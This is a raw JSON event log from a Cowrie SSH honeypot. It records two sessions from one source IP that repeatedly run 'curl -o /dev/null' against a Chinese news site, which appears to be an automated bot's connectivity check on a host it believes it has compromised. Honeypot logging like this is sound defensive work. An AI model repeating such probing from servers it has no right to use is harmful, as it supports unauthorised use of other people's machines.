{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.296440Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.305305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.306083Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.309903Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.313600Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.315985Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.317978Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.319443Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.320032Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.327644Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.329533Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.332286Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.344741Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.345562Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.361390Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.362127Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.382149Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.383700Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.399966Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.400729Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.418483Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.419312Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.427662Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.438149Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.438895Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.457048Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.457791Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.464166Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.477240Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.481094Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.482079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.494428Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.495533Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.501490Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.520647Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.521487Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.531413Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.532287Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.548978Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.558041Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.559095Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.566864Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.567895Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.596621Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.597764Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.624130Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.625079Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.635756Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.655573Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.657308Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.663841Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.665456Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.668401Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.669618Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.672624Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.684005Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.696890Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.697926Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.700855Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.703678Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.705741Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.708589Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.709743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.710508Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.737633Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.738476Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.745528Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.746274Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.778267Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.782983Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.786229Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.791198Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.795673Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.796443Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.802276Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.803390Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.810262Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.839065Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.840023Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:33.844520Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.845683Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:33.861165Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
